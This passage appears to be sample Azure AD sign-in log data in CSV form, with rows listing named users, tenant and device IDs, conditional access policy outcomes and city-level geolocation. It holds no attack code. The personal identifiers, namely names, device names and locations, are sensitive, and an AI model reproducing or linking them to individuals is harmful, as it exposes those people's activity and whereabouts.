'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 15:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",f22e123a-cab3-4cb1-81e0-9a3bbca91800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,f22e123a-cab3-4cb1-81e0-9a3bbca91800,SigninLogs,Sucess,36.6404686,-78.26995087
+71,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,30:36.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 11:30,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",87802367-3de7-42c2-ada0-d6bcbece0a00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,87802367-3de7-42c2-ada0-d6bcbece0a00,SigninLogs,Sucess,33.0175209,35.44601059
+72,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,45:39.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,94cffed0-4baa-4b97-86d0-9876ba9fbdf4,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 07:45,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",b6b1e129-7976-4148-98ee-f605b7d80d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,b6b1e129-7976-4148-98ee-f605b7d80d00,SigninLogs,Sucess,50.6406517,5.572050095
+73,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,07:12.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7502479f-f0ef-0000-4803-26285aa6f595,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 08:07,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",e3e64b68-7d91-478e-bf30-aa3b08c20b00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,e3e64b68-7d91-478e-bf30-aa3b08c20b00,SigninLogs,Sucess,50.6406517,5.572050095
+74,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:58.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6d015e19-944d-4a40-abe5-ba6795158b68,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 12:34,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",e9cfabe1-d666-446f-aeb7-58176d070d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,e9cfabe1-d666-446f-aeb7-58176d070d00,SigninLogs,Sucess,50.6406517,5.572050095
+75,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:06.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d9290350-4159-4ec3-8955-3d1c2de1d5d8,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 11:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",2dc92ee6-03c4-4d81-9c6d-29ffa6ea0900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,2dc92ee6-03c4-4d81-9c6d-29ffa6ea0900,SigninLogs,Sucess,36.6404686,-78.26995087
+76,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:54.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,63279545-87f1-4112-9cf6-11e99a03931f,Microsoft.aadiam,Microsoft.aadiam,,Sri Laxmi Sangabathula,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 01:01,"{'operatingSystem': 'Windows 10', 'deviceId': '1aec47a5-7dee-4fd4-be7f-5e85deea66b1', 'browser': 'Chrome 80.0.3987', 'displayName': 'SRISANG', 'isCompliant': True, 'trustType': 'Hybrid Azure AD joined', 'isManaged': True}",e8a8eec9-7c29-4869-b368-f10accbb0100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.04237365722656, 'latitude': 47.62879180908203}, 'state': 'Washington', 'city': 'Sammamish'}",none,none,none,none,[],{'errorCode': 0},Sri Laxmi Sangabathula,ebd55c3c-6338-424d-ad09-46d2147f7598,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,e8a8eec9-7c29-4869-b368-f10accbb0100,SigninLogs,Sucess,47.62879181,-122.0423737
+77,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:56.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7c3778ea-9924-47ad-84c0-7b31e90502c8,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 10:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",2dc92ee6-03c4-4d81-9c6d-29ffbd640900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,2dc92ee6-03c4-4d81-9c6d-29ffbd640900,SigninLogs,Sucess,36.6404686,-78.26995087
+78,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,07:54.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,44c1469f-a0e4-0000-5683-44b7d2c36994,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, 